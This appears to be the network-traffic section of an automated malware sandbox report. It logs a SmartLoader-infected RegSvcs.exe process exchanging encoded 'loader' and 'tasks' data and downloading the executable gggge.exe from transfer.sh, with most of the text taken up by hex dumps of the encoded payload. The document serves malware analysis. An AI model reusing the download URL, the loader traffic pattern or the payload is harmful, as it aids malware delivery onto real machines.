73 5a 44 51 73 5a 6a 55 73 22 2c 22 74 61 73 6b 73 22 3a 22 59 54 49 73 5a 44 49 73 4f 44 51 73 5a 44 41 73 5a 44 41 73 4e 57 45 73 4f 47 51 73 4e 7a 63 73 59 57 51 73 59 54 67 73 4f 44 6b 73 4f 44 4d 73 4e 6a 67 73 4e 47 59 73 59 7a 41 73 59 57 45 73 59 7a 45 73 5a 54 51 73 4f 44 63 73 59 54 4d 73 4e 54 59 73 4f 54 63 73 59 32 59 73 59 54 45 73 59 7a 51 73 59 7a 41 73 5a 54 59 73 Data Ascii: {"loader":"YzIsNzksYzQsZTAsZGMsOTksYzYsY2EsZDcsZGIsYmEsYmQsYWQsOWIsYjgsYTYsYzUsOWIsOWYsODksNjcsYTEsODcsNGYsYjEsYzUsZTcsYzgsYjksYTUsZGMsNTksODEsNzcsOTMsOTMsOGMsNWEsYzUsYmMsZTQsZDgsY2EsYzUsYWIsOTUsNzYsN2IsNzMsZjQsODcsZGQsOWYsZTIsY2MsNGYsOGEsNzAsYTAsOGEsNzMsNTAsOTAsYWEsYmIsYjgsZDYsZGMsZGYsNWEsOGQsNzcsZGUsZDgsYzEsY2EsYWQsYWEsODAsNjEsNzUsZWQsYzYsY2IsYTIsZGEsZGIsNGYsOGEsNzAsZWUsN2IsYmIsOTUsZTYsYWIsNjksOTEsODIsODksYWQsYTYsNzMsYmMsZWEsZTksYzQsYzksNjgsOWMsYjcsYTQsYzgsZWIsZDcsY2UsOWEsOTcsOTMsNGQsNzIsYzMsZTcsYmEsYmIsYTUsZTEsNTksODEsNzcsYzgsYzgsZDgsYWIsYjgsZDQsZjUs","tasks":"YTIsZDIsODQsZDAsZDAsNWEsOGQsNzcsYWQsYTgsODksODMsNjgsNGYsYzAsYWEsYzEsZTQsODcsYTMsNTYsOTcsY2YsYTEsYzQsYzAsZTYs
Mar 24, 2023 15:28:22.013197899 CET	159	IN	Data Raw: 4f 54 4d 73 4e 7a 59 73 4e 57 59 73 5a 54 49 73 59 54 6b 73 59 54 67 73 59 7a 55 73 5a 44 55 73 59 32 51 73 5a 44 45 73 59 57 45 73 4f 44 45 73 59 32 45 73 5a 54 41 73 59 54 59 73 59 6d 4d 73 59 6d 4d 73 59 6d 4d 73 4e 57 4d 73 59 32 51 73 4f 44 Data Ascii: OTMsNzYsNWYsZTIsYTksYTgsYzUsZDUsY2QsZDEsYWEsODEsY2EsZTAsYTYsYmMsYmMsYmMsNWMsY2QsODIsOTgsYzksZDUsZDUsNjUsZGMsY2UsOTQsYjcsYjUsYTEsYmUsYmYsOTUsOTAsNjMsNjcsNzksYzgsZDAsZDgsOWQsYjIsYzcsZDksZWIsYmQsNzksODIsNGQsNzYsOTUsYjgsZTYsZDUsOGIsNjIsOTUsODksOTM

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49705	144.76.136.153	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
Mar 24, 2023 15:28:22.177503109 CET	160	OUT	GET /get/yAEPpl/gggge.exe HTTP/1.1 Content-Type: application/json User-Agent: SmartLoader Host: transfer.sh
Mar 24, 2023 15:28:22.208076000 CET	160	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 Date: Fri, 24 Mar 2023 14:28:22 GMT Content-Type: text/html Content-Length: 169 Connection: keep-alive Location: https://transfer.sh/get/yAEPpl/gggge.exe Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	53341	144.76.136.153	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-24 14:28:22 UTC	0	OUT	GET /get/yAEPpl/gggge.exe HTTP/1.1 User-Agent: SmartLoader Host: transfer.sh Connection: Keep-Alive
2023-03-24 14:28:23 UTC	0	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 24 Mar 2023 14:28:23 GMT Content-Type: application/x-ms-dos-executable Content-Length: 1761013 Connection: close Cache-Control: no-store Content-Disposition: attachment; filename="gggge.exe" Retry-After: Fri, 24 Mar 2023 15:28:24 GMT X-Made-With: <3 by DutchCoders X-Ratelimit-Key: 127.0.0.1,84.17.52.40,84.17.52.40 X-Ratelimit-Limit: 10 X-Ratelimit-Rate: 600 X-Ratelimit-Remaining: 9 X-Ratelimit-Reset: 1679668104 X-Remaining-Days: n/a X-Remaining-Downloads: n/a X-Served-By: Proudly served by DutchCoders Strict-Transport-Security: max-age=63072000
2023-03-24 14:28:23 UTC	0	IN	Data Raw: 39 34 2c 62 31 2c 66 32 2c 36 37 2c 36 66 2c 33 38 2c 35 33 2c 35 37 2c 37 63 2c 37 37 2c 35 35 2c 35 37 2c 31 34 37 2c 31 32 63 2c 35 34 2c 34 31 2c 31 30 62 2c 37 39 2c 36 35 2c 36 39 2c 33 36 2c 37 35 2c 36 37 2c 32 64 2c 39 30 2c 35 30 2c 37 33 2c 35 39 2c 34 37 2c 33 30 2c 36 65 2c 33 37 2c 34 37 2c 35 37 2c 36 32 2c 36 37 2c 36 63 2c 33 38 2c 35 33 2c 35 37 2c 37 38 2c 37 37 2c 35 35 2c 35 37 2c 34 38 2c 32 64 2c 35 34 2c 34 31 2c 35 33 2c 37 39 2c 36 35 2c 36 39 2c 33 36 2c 37 35 2c 36 37 2c 32 64 2c 35 30 2c 35 30 2c 37 33 2c 35 39 2c 63 37 2c 33 30 2c 36 65 2c 33 37 2c 35 35 2c 37 36 2c 31 31 63 2c 37 35 2c 36 63 2c 65 63 2c 35 63 2c 31 32 34 2c 39 39 2c 31 32 66 2c 35 36 2c 61 33 2c 31 31 35 2c 34 65 2c 61 38 2c 61 39 2c 62 63 2c 65 63 2c 38 35 Data Ascii: 94,b1,f2,67,6f,38,53,57,7c,77,55,57,147,12c,54,41,10b,79,65,69,36,75,67,2d,90,50,73,59,47,30,6e,37,47,57,62,67,6c,38,53,57,78,77,55,57,48,2d,54,41,53,79,65,69,36,75,67,2d,50,50,73,59,c7,30,6e,37,55,76,11c,75,6c,ec,5c,124,99,12f,56,a3,115,4e,a8,a9,bc,ec,85
2023-03-24 14:28:23 UTC	16	IN	Data Raw: 34 2c 37 38 2c 31 32 30 2c 31 30 33 2c 62 35 2c 35 37 2c 31 33 66 2c 34 36 2c 37 61 2c 31 31 37 2c 31 30 36 2c 36 65 2c 63 37 2c 63 35 2c 62 66 2c 65 35 2c 31 34 31 2c 38 64 2c 37 33 2c 35 39 2c 66 66 2c 31 31 32 2c 38 61 2c 33 37 2c 34 37 2c 31 30 66 2c 31 30 32 2c 37 39 2c 36 63 2c 33 38 2c 61 33 2c 31 30 66 2c 31 33 33 2c 37 61 2c 35 35 2c 35 37 2c 31 30 30 2c 36 34 2c 37 63 2c 34 31 2c 35 33 2c 64 31 2c 62 36 2c 31 32 32 2c 61 63 2c 65 34 2c 36 37 2c 32 64 2c 61 39 2c 31 30 38 2c 63 61 2c 61 64 2c 34 37 2c 33 30 2c 63 36 2c 38 64 2c 31 33 32 2c 36 36 2c 38 63 2c 61 30 2c 31 33 61 2c 65 38 2c 61 61 2c 65 65 2c 61 39 2c 66 31 2c 31 33 34 2c 63 31 2c 66 65 2c 62 66 2c 36 62 2c 66 36 2c 31 30 30 2c 31 30 39 2c 31 35 30 2c 37 38 2c 31 33 34 2c 31 36 36 2c Data Ascii: 4,78,120,103,b5,57,13f,46,7a,117,106,6e,c7,c5,bf,e5,141,8d,73,59,ff,112,8a,37,47,10f,102,79,6c,38,a3,10f,133,7a,55,57,100,64,7c,41,53,d1,b6,122,ac,e4,67,2d,a9,108,ca,ad,47,30,c6,8d,132,66,8c,a0,13a,e8,aa,ee,a9,f1,134,c1,fe,bf,6b,f6,100,109,150,78,134,166,
2023-03-24 14:28:23 UTC	32	IN	Data Raw: 2c 31 31 65 2c 31 32 65 2c 64 61 2c 31 34 30 2c 66 66 2c 31 32 65 2c 31 37 34 2c 65 31 2c 64 36 2c 34 37 2c 31 32 31 2c 61 62 2c 36 34 2c 37 38 2c 65 33 2c 63 36 2c 37 35 2c 38 35 2c 39 38 2c 66 64 2c 63 37 2c 66 66 2c 35 62 2c 36 39 2c 36 37 2c 36 63 2c 38 61 2c 31 30 64 2c 31 30 61 2c 38 33 2c 37 37 2c 35 35 2c 62 31 2c 31 30 30 2c 39 61 2c 61 31 2c 34 31 2c 35 33 2c 64 31 2c 62 35 2c 66 39 2c 65 65 2c 31 34 37 2c 62 36 2c 32 64 2c 35 30 2c 61 38 2c 63 35 2c 31 31 33 2c 31 32 64 2c 37 63 2c 36 65 2c 33 37 2c 31 30 31 2c 65 65 2c 62 34 2c 36 37 2c 36 63 2c 38 61 2c 61 34 2c 31 31 30 2c 31 35 61 2c 62 37 2c 35 35 2c 35 37 2c 31 30 31 2c 33 34 2c 36 38 2c 34 31 2c 35 33 2c 31 33 32 2c 66 37 2c 61 64 2c 33 36 2c 37 35 2c 31 32 30 2c 62 36 2c 38 32 2c 35 30 Data Ascii: ,11e,12e,da,140,ff,12e,174,e1,d6,47,121,ab,64,78,e3,c6,75,85,98,fd,c7,ff,5b,69,67,6c,8a,10d,10a,83,77,55,b1,100,9a,a1,41,53,d1,b5,f9,ee,147,b6,2d,50,a8,c5,113,12d,7c,6e,37,101,ee,b4,67,6c,8a,a4,110,15a,b7,55,57,101,34,68,41,53,132,f7,ad,36,75,120,b6,82,50
2023-03-24 14:28:23 UTC	48	IN	Data Raw: 63 61 2c 31 31 62 2c 66 61 2c 31 31 33 2c 66 62 2c 37 39 2c 66 31 2c 62 31 2c 38 64 2c 39 39 2c 31 31 31 2c 36 39 2c 61 65 2c 36 63 2c 33 38 2c 31 33 65 2c 37 30 2c 31 36 30 2c 37 39 2c 64 62 2c 31 30 62 2c 38 66 2c 31 31 30 2c 63 36 2c 31 30 36 2c 31 33 62 2c 31 34 64 2c 31 30 61 2c 31 31 64 2c 37 65 2c 31 30 65 2c 38 65 2c 38 63 2c 35 64 2c 63 31 2c 31 30 61 2c 65 33 2c 31 33 34 2c 33 63 2c 66 64 2c 39 66 2c 35 32 2c 61 37 2c 31 31 61 2c 31 35 32 2c 37 38 2c 33 38 2c 35 33 2c 61 66 2c 64 32 2c 63 38 2c 31 30 65 2c 66 30 2c 39 36 2c 32 64 2c 35 34 2c 39 61 2c 61 33 2c 31 33 31 2c 66 63 2c 38 30 2c 33 36 2c 37 35 2c 31 35 32 2c 33 63 2c 31 30 63 2c 31 31 65 2c 62 64 2c 38 62 2c 31 30 63 2c 66 37 2c 31 33 62 2c 38 33 2c 65 34 2c 63 64 2c 36 63 2c 65 63 2c Data Ascii: ca,11b,fa,113,fb,79,f1,b1,8d,99,111,69,ae,6c,38,13e,70,160,79,db,10b,8f,110,c6,106,13b,14d,10a,11d,7e,10e,8e,8c,5d,c1,10a,e3,134,3c,fd,9f,52,a7,11a,152,78,38,53,af,d2,c8,10e,f0,96,2d,54,9a,a3,131,fc,80,36,75,152,3c,10c,11e,bd,8b,10c,f7,13b,83,e4,cd,6c,ec,
2023-03-24 14:28:23 UTC	64	IN	Data Raw: 32 35 2c 63 36 2c 31 32 33 2c 36 32 2c 39 33 2c 31 36 63 2c 65 39 2c 31 32 65 2c 31 31 65 2c 62 62 2c 39 30 2c 36 65 2c 35 39 2c 31 32 36 2c 31 35 37 2c 31 34 38 2c 65 37 2c 64 39 2c 31 36 32 2c 62 37 2c 38 35 2c 31 33 62 2c 35 66 2c 39 37 2c 61 66 2c 39 31 2c 35 31 2c 31 33 64 2c 61 32 2c 31 31 39 2c 31 30 35 2c 65 36 2c 31 30 61 2c 38 39 2c 37 63 2c 66 30 2c 38 38 2c 31 32 64 2c 63 37 2c 31 30 64 2c 31 30 39 2c 62 61 2c 32 64 2c 35 34 2c 66 39 2c 61 30 2c 63 39 2c 36 35 2c 36 39 2c 38 65 2c 31 36 30 2c 37 36 2c 62 30 2c 62 65 2c 36 62 2c 63 35 2c 65 33 2c 31 33 37 2c 36 33 2c 65 37 2c 39 62 2c 63 36 2c 31 35 33 2c 61 64 2c 31 35 65 2c 62 63 2c 38 66 2c 31 33 65 2c 35 63 2c 31 33 63 2c 38 36 2c 37 61 2c 31 31 62 2c 31 30 33 2c 37 65 2c 31 30 64 2c 31 31 Data Ascii: 25,c6,123,62,93,16c,e9,12e,11e,bb,90,6e,59,126,157,148,e7,d9,162,b7,85,13b,5f,97,af,91,51,13d,a2,119,105,e6,10a,89,7c,f0,88,12d,c7,10d,109,ba,2d,54,f9,a0,c9,65,69,8e,160,76,b0,be,6b,c5,e3,137,63,e7,9b,c6,153,ad,15e,bc,8f,13e,5c,13c,86,7a,11b,103,7e,10d,11
2023-03-24 14:28:23 UTC	80	IN	Data Raw: 2c 62 30 2c 64 61 2c 65 38 2c 35 66 2c 61 32 2c 38 35 2c 63 61 2c 31 33 62 2c 36 39 2c 31 34 38 2c 38 63 2c 31 30 32 2c 63 33 2c 31 36 32 2c 31 33 30 2c 65 36 2c 37 31 2c 39 30 2c 31 31 32 2c 31 33 38 2c 62 65 2c 63 35 2c 31 33 34 2c 62 36 2c 31 35 31 2c 31 30 62 2c 31 34 38 2c 66 35 2c 36 38 2c 37 36 2c 66 38 2c 61 62 2c 31 30 63 2c 31 33 32 2c 62 62 2c 39 30 2c 63 35 2c 31 35 32 2c 33 32 2c 31 30 31 2c 63 31 2c 31 36 34 2c 31 34 61 2c 39 38 2c 31 31 62 2c 37 64 2c 65 35 2c 62 64 2c 31 32 37 2c 31 35 32 2c 31 34 31 2c 37 65 2c 35 64 2c 35 66 2c 63 32 2c 31 36 32 2c 38 65 2c 31 31 64 2c 31 33 31 2c 65 38 2c 34 66 2c 61 34 2c 31 32 63 2c 36 63 2c 38 39 2c 38 36 2c 31 36 32 2c 39 64 2c 31 36 35 2c 64 38 2c 36 63 2c 31 33 61 2c 38 33 2c 66 32 2c 31 32 61 2c Data Ascii: ,b0,da,e8,5f,a2,85,ca,13b,69,148,8c,102,c3,162,130,e6,71,90,112,138,be,c5,134,b6,151,10b,148,f5,68,76,f8,ab,10c,132,bb,90,c5,152,32,101,c1,164,14a,98,11b,7d,e5,bd,127,152,141,7e,5d,5f,c2,162,8e,11d,131,e8,4f,a4,12c,6c,89,86,162,9d,165,d8,6c,13a,83,f2,12a,
2023-03-24 14:28:23 UTC	96	IN	Data Raw: 33 35 2c 38 62 2c 38 33 2c 31 32 61 2c 31 34 63 2c 31 32 34 2c 62 38 2c 31 32 35 2c 66 33 2c 36 34 2c 35 37 2c 37 38 2c 64 30 2c 31 34 30 2c 36 36 2c 31 33 38 2c 33 64 2c 64 35 2c 39 62 2c 37 61 2c 62 62 2c 37 63 2c 37 36 2c 35 31 2c 31 34 65 2c 31 31 34 2c 31 30 36 2c 39 65 2c 31 31 63 2c 61 35 2c 61 61 2c 31 30 30 2c 39 36 2c 62 62 2c 33 37 2c 34 37 2c 62 30 2c 31 34 64 2c 37 36 2c 63 31 2c 66 62 2c 31 34 66 2c 65 62 2c 64 65 2c 38 61 2c 64 39 2c 61 66 2c 36 65 2c 36 38 2c 66 64 2c 66 62 2c 36 65 2c 66 30 2c 31 35 34 2c 62 39 2c 38 65 2c 63 35 2c 31 31 66 2c 39 37 2c 36 61 2c 35 30 2c 37 33 2c 31 31 31 2c 31 31 61 2c 61 65 2c 36 65 2c 33 37 2c 31 33 32 2c 37 30 2c 65 35 2c 64 38 2c 64 34 2c 34 31 2c 39 66 2c 64 39 2c 61 64 2c 65 66 2c 31 30 65 2c 62 65 Data Ascii: 35,8b,83,12a,14c,124,b8,125,f3,64,57,78,d0,140,66,138,3d,d5,9b,7a,bb,7c,76,51,14e,114,106,9e,11c,a5,aa,100,96,bb,37,47,b0,14d,76,c1,fb,14f,eb,de,8a,d9,af,6e,68,fd,fb,6e,f0,154,b9,8e,c5,11f,97,6a,50,73,111,11a,ae,6e,37,132,70,e5,d8,d4,41,9f,d9,ad,ef,10e,be
2023-03-24 14:28:23 UTC	112	IN	Data Raw: 2c 31 30 34 2c 64 62 2c 66 39 2c 38 33 2c 31 31 30 2c 31 35 30 2c 31 35 39 2c 62 30 2c 37 35 2c 35 62 2c 31 32 65 2c 61 36 2c 31 36 32 2c 35 61 2c 39 35 2c 65 63 2c 65 63 2c 31 34 38 2c 35 31 2c 31 33 65 2c 37 65 2c 63 34 2c 62 36 2c 31 30 36 2c 65 31 2c 39 30 2c 37 64 2c 61 38 2c 31 33 62 2c 38 32 2c 35 61 2c 36 63 2c 31 30 62 2c 31 32 62 2c 38 32 2c 31 31 66 2c 63 63 2c 38 33 2c 37 66 2c 37 34 2c 31 30 64 2c 39 32 2c 38 66 2c 31 33 64 2c 65 61 2c 61 35 2c 61 66 2c 39 39 2c 38 36 2c 31 33 66 2c 34 36 2c 39 63 2c 38 32 2c 31 35 36 2c 37 38 2c 37 30 2c 63 35 2c 31 31 66 2c 36 38 2c 35 62 2c 35 30 2c 37 33 2c 62 31 2c 31 33 32 2c 33 35 2c 31 33 65 2c 37 31 2c 39 64 2c 38 37 2c 31 33 61 2c 63 30 2c 31 35 37 2c 34 37 2c 66 64 2c 63 31 2c 65 65 2c 39 39 2c 39 Data Ascii: ,104,db,f9,83,110,150,159,b0,75,5b,12e,a6,162,5a,95,ec,ec,148,51,13e,7e,c4,b6,106,e1,90,7d,a8,13b,82,5a,6c,10b,12b,82,11f,cc,83,7f,74,10d,92,8f,13d,ea,a5,af,99,86,13f,46,9c,82,156,78,70,c5,11f,68,5b,50,73,b1,132,35,13e,71,9d,87,13a,c0,157,47,fd,c1,ee,99,9
2023-03-24 14:28:23 UTC	128	IN	Data Raw: 61 30 2c 35 33 2c 37 39 2c 31 35 30 2c 37 38 2c 31 31 61 2c 64 63 2c 37 32 2c 66 36 2c 63 66 2c 63 35 2c 31 34 34 2c 37 36 2c 31 32 34 2c 39 31 2c 31 32 61 2c 38 64 2c 31 33 65 2c 62 32 2c 64 39 2c 63 30 2c 62 63 2c 31 32 33 2c 36 63 2c 36 65 2c 31 35 65 2c 38 66 2c 65 65 2c 36 34 2c 65 38 2c 39 62 2c 37 36 2c 62 32 2c 31 30 30 2c 31 37 33 2c 39 63 2c 63 37 2c 31 32 66 2c 61 61 2c 31 31 61 2c 63 32 2c 31 33 65 2c 37 35 2c 62 31 2c 31 34 30 2c 62 66 2c 65 36 2c 64 39 2c 38 35 2c 31 33 32 2c 36 36 2c 36 33 2c 39 61 2c 36 63 2c 61 64 2c 64 66 2c 37 36 2c 62 61 2c 31 34 39 2c 62 61 2c 64 31 2c 35 31 2c 31 30 66 2c 35 62 2c 31 31 61 2c 31 32 32 2c 63 61 2c 31 31 65 2c 31 33 32 2c 34 35 2c 37 35 2c 36 37 2c 37 64 2c 31 30 38 2c 31 31 32 2c 38 62 2c 35 39 2c 34 Data Ascii: a0,53,79,150,78,11a,dc,72,f6,cf,c5,144,76,124,91,12a,8d,13e,b2,d9,c0,bc,123,6c,6e,15e,8f,ee,64,e8,9b,76,b2,100,173,9c,c7,12f,aa,11a,c2,13e,75,b1,140,bf,e6,d9,85,132,66,63,9a,6c,ad,df,76,ba,149,ba,d1,51,10f,5b,11a,122,ca,11e,132,45,75,67,7d,108,112,8b,59,4
2023-03-24 14:28:23 UTC	144	IN	Data Raw: 34 2c 39 34 2c 37 39 2c 35 37 2c 37 38 2c 63 66 2c 65 35 2c 31 31 30 2c 37 64 2c 37 30 2c 35 34 2c 34 31 2c 61 63 2c 31 30 32 2c 61 39 2c 38 64 2c 33 65 2c 63 35 2c 62 66 2c 66 34 2c 35 34 2c 37 34 2c 62 33 2c 35 39 2c 38 38 2c 33 30 2c 31 35 39 2c 34 36 2c 31 34 34 2c 62 62 2c 65 39 2c 64 66 2c 65 63 2c 31 31 39 2c 31 34 36 2c 39 33 2c 31 33 35 2c 64 66 2c 37 38 2c 31 32 64 2c 66 37 2c 62 37 2c 31 33 66 2c 39 33 2c 61 64 2c 31 36 31 2c 63 66 2c 63 32 2c 31 33 35 2c 31 37 34 2c 62 37 2c 37 66 2c 61 61 2c 31 30 38 2c 61 37 2c 38 31 2c 34 37 2c 33 30 2c 62 66 2c 66 30 2c 31 34 31 2c 39 38 2c 36 32 2c 36 37 2c 31 35 37 2c 34 37 2c 31 30 36 2c 39 32 2c 66 30 2c 38 65 2c 36 35 2c 66 38 2c 65 63 2c 33 61 2c 31 31 39 2c 37 37 2c 31 31 30 2c 31 36 62 2c 63 65 2c Data Ascii: 4,94,79,57,78,cf,e5,110,7d,70,54,41,ac,102,a9,8d,3e,c5,bf,f4,54,74,b3,59,88,30,159,46,144,bb,e9,df,ec,119,146,93,135,df,78,12d,f7,b7,13f,93,ad,161,cf,c2,135,174,b7,7f,aa,108,a7,81,47,30,bf,f0,141,98,62,67,157,47,106,92,f0,8e,65,f8,ec,3a,119,77,110,16b,ce,
2023-03-24 14:28:23 UTC	160	IN	Data Raw: 39 2c 61 66 2c 64 66 2c 37 30 2c 31 30 61 2c 66 65 2c 31 36 37 2c 31 32 61 2c 66 37 2c 66 39 2c 61 65 2c 31 31 65 2c 35 62 2c 35 32 2c 37 64 2c 63 38 2c 66 63 2c 39 32 2c 38 37 2c 63 65 2c 62 37 2c 38 35 2c 61 38 2c 61 61 2c 31 35 65 2c 36 38 2c 37 38 2c 64 62 2c 31 36 35 2c 33 37 2c 38 39 2c 61 63 2c 65 34 2c 31 34 33 2c 31 35 32 2c 31 31 31 2c 38 31 2c 66 39 2c 61 37 2c 31 36 31 2c 37 31 2c 31 30 66 2c 64 34 2c 34 36 2c 35 34 2c 34 31 2c 31 30 62 2c 31 37 35 2c 39 38 2c 36 39 2c 33 36 2c 63 37 2c 31 35 32 2c 33 63 2c 64 35 2c 63 33 2c 62 61 2c 62 34 2c 31 30 30 2c 39 62 2c 31 34 66 2c 38 37 2c 35 36 2c 62 37 2c 39 64 2c 31 34 66 2c 64 33 2c 37 39 2c 38 32 2c 31 34 32 2c 39 31 2c 37 39 2c 31 30 64 2c 37 64 2c 64 35 2c 35 64 2c 39 38 2c 64 39 2c 31 34 32 Data Ascii: 9,af,df,70,10a,fe,167,12a,f7,f9,ae,11e,5b,52,7d,c8,fc,92,87,ce,b7,85,a8,aa,15e,68,78,db,165,37,89,ac,e4,143,152,111,81,f9,a7,161,71,10f,d4,46,54,41,10b,175,98,69,36,c7,152,3c,d5,c3,ba,b4,100,9b,14f,87,56,b7,9d,14f,d3,79,82,142,91,79,10d,7d,d5,5d,98,d9,142
2023-03-24 14:28:23 UTC	176	IN	Data Raw: 2c 38 32 2c 31 33 61 2c 31 33 31 2c 62 30 2c 62 65 2c 31 33 30 2c 66 33 2c 65 61 2c 38 34 2c 31 31 62 2c 31 32 31 2c 31 33 35 2c 32 64 2c 35 39 2c 31 32 63 2c 36 32 2c 66 64 2c 63 31 2c 31 35 39 2c 33 63 2c 31 36 61 2c 64 39 2c 36 63 2c 38 65 2c 35 30 2c 31 36 35 2c 62 37 2c 63 33 2c 38 33 2c 31 32 39 2c 39 38 2c 31 33 32 2c 36 36 2c 38 64 2c 31 35 30 2c 38 63 2c 31 30 62 2c 36 30 2c 64 39 2c 38 37 2c 31 34 66 2c 35 66 2c 63 37 2c 66 39 2c 65 32 2c 62 30 2c 65 62 2c 36 34 2c 63 61 2c 31 31 65 2c 31 34 33 2c 33 66 2c 37 35 2c 36 37 2c 65 36 2c 65 39 2c 38 61 2c 37 33 2c 35 39 2c 31 30 30 2c 38 66 2c 61 31 2c 33 37 2c 34 37 2c 31 31 30 2c 31 35 64 2c 63 35 2c 36 63 2c 33 38 2c 61 63 2c 31 34 32 2c 39 31 2c 37 62 2c 31 34 64 2c 62 66 2c 31 34 36 2c 31 30 33 Data Ascii: ,82,13a,131,b0,be,130,f3,ea,84,11b,121,135,2d,59,12c,62,fd,c1,159,3c,16a,d9,6c,8e,50,165,b7,c3,83,129,98,132,66,8d,150,8c,10b,60,d9,87,14f,5f,c7,f9,e2,b0,eb,64,ca,11e,143,3f,75,67,e6,e9,8a,73,59,100,8f,a1,37,47,110,15d,c5,6c,38,ac,142,91,7b,14d,bf,146,103
2023-03-24 14:28:23 UTC	192	IN	Data Raw: 34 2c 61 32 2c 31 31 65 2c 64 30 2c 31 31 36 2c 37 33 2c 31 34 33 2c 65 63 2c 31 30 31 2c 31 30 35 2c 31 33 33 2c 37 39 2c 63 39 2c 36 33 2c 61 35 2c 31 31 37 2c 61 62 2c 65 63 2c 66 66 2c 31 32 63 2c 61 35 2c 31 33 38 2c 31 31 32 2c 31 34 32 2c 38 66 2c 38 64 2c 65 62 2c 31 30 32 2c 38 30 2c 31 32 63 2c 31 31 62 2c 63 32 2c 34 33 2c 31 31 62 2c 39 32 2c 64 37 2c 62 38 2c 31 33 64 2c 31 35 36 2c 64 38 2c 37 63 2c 61 65 2c 31 31 31 2c 66 34 2c 31 32 33 2c 31 35 31 2c 37 61 2c 31 35 65 2c 31 35 39 2c 35 33 2c 31 30 65 2c 62 66 2c 62 63 2c 31 36 66 2c 31 30 33 2c 36 39 2c 31 30 35 2c 31 32 30 2c 37 38 2c 31 30 35 2c 64 31 2c 38 34 2c 38 36 2c 38 61 2c 31 32 39 2c 63 63 2c 31 31 37 2c 34 32 2c 36 62 2c 66 35 2c 37 34 2c 36 64 2c 36 31 2c 39 35 2c 61 64 2c 34 Data Ascii: 4,a2,11e,d0,116,73,143,ec,101,105,133,79,c9,63,a5,117,ab,ec,ff,12c,a5,138,112,142,8f,8d,eb,102,80,12c,11b,c2,43,11b,92,d7,b8,13d,156,d8,7c,ae,111,f4,123,151,7a,15e,159,53,10e,bf,bc,16f,103,69,105,120,78,105,d1,84,86,8a,129,cc,117,42,6b,f5,74,6d,61,95,ad,4
2023-03-24 14:28:23 UTC	208	IN	Data Raw: 64 2c 64 39 2c 31 33 63 2c 63 66 2c 65 63 2c 31 31 62 2c 37 61 2c 31 34 37 2c 66 38 2c 61 63 2c 31 30 63 2c 34 34 2c 66 37 2c 36 35 2c 38 65 2c 31 31 33 2c 31 31 30 2c 66 62 2c 37 34 2c 31 31 31 2c 31 31 64 2c 31 30 63 2c 63 39 2c 62 38 2c 31 33 33 2c 38 39 2c 31 32 36 2c 31 31 33 2c 31 31 35 2c 39 62 2c 34 66 2c 66 30 2c 31 34 63 2c 62 66 2c 63 35 2c 33 65 2c 62 32 2c 31 34 30 2c 64 33 2c 31 37 32 2c 66 35 2c 37 32 2c 66 66 2c 31 31 65 2c 31 33 62 2c 34 36 2c 62 63 2c 31 36 30 2c 63 31 2c 31 35 31 2c 31 32 35 2c 31 37 34 2c 31 36 30 2c 35 32 2c 62 34 2c 62 65 2c 31 34 65 2c 31 30 61 2c 38 64 2c 37 63 2c 31 35 35 2c 31 32 32 2c 63 31 2c 62 30 2c 65 38 2c 64 34 2c 64 34 2c 63 65 2c 31 34 38 2c 61 36 2c 31 33 66 2c 61 39 2c 35 62 2c 65 35 2c 66 65 2c 31 30 Data Ascii: d,d9,13c,cf,ec,11b,7a,147,f8,ac,10c,44,f7,65,8e,113,110,fb,74,111,11d,10c,c9,b8,133,89,126,113,115,9b,4f,f0,14c,bf,c5,3e,b2,140,d3,172,f5,72,ff,11e,13b,46,bc,160,c1,151,125,174,160,52,b4,be,14e,10a,8d,7c,155,122,c1,b0,e8,d4,d4,ce,148,a6,13f,a9,5b,e5,fe,10
2023-03-24 14:28:23 UTC	224	IN	Data Raw: 31 35 33 2c 63 33 2c 65 63 2c 31 30 37 2c 37 61 2c 36 64 2c 31 32 39 2c 38 34 2c 31 32 32 2c 64 39 2c 34 37 2c 31 34 39 2c 65 64 2c 31 31 65 2c 39 64 2c 66 36 2c 31 32 61 2c 66 63 2c 64 34 2c 66 39 2c 35 35 2c 63 63 2c 39 66 2c 31 30 30 2c 37 38 2c 63 30 2c 31 32 62 2c 65 66 2c 65 65 2c 31 31 38 2c 36 33 2c 65 66 2c 31 32 30 2c 34 39 2c 62 35 2c 31 34 31 2c 61 66 2c 61 39 2c 31 32 34 2c 31 30 38 2c 31 30 34 2c 31 30 63 2c 65 39 2c 31 32 65 2c 31 30 34 2c 38 33 2c 31 30 62 2c 37 63 2c 31 33 38 2c 66 37 2c 31 36 66 2c 31 30 38 2c 31 31 34 2c 62 31 2c 63 36 2c 38 64 2c 38 39 2c 62 63 2c 63 36 2c 64 30 2c 36 39 2c 64 61 2c 31 30 37 2c 31 37 34 2c 38 36 2c 62 63 2c 31 32 32 2c 63 33 2c 31 30 31 2c 36 32 2c 31 33 62 2c 31 32 63 2c 31 36 64 2c 63 36 2c 37 63 2c Data Ascii: 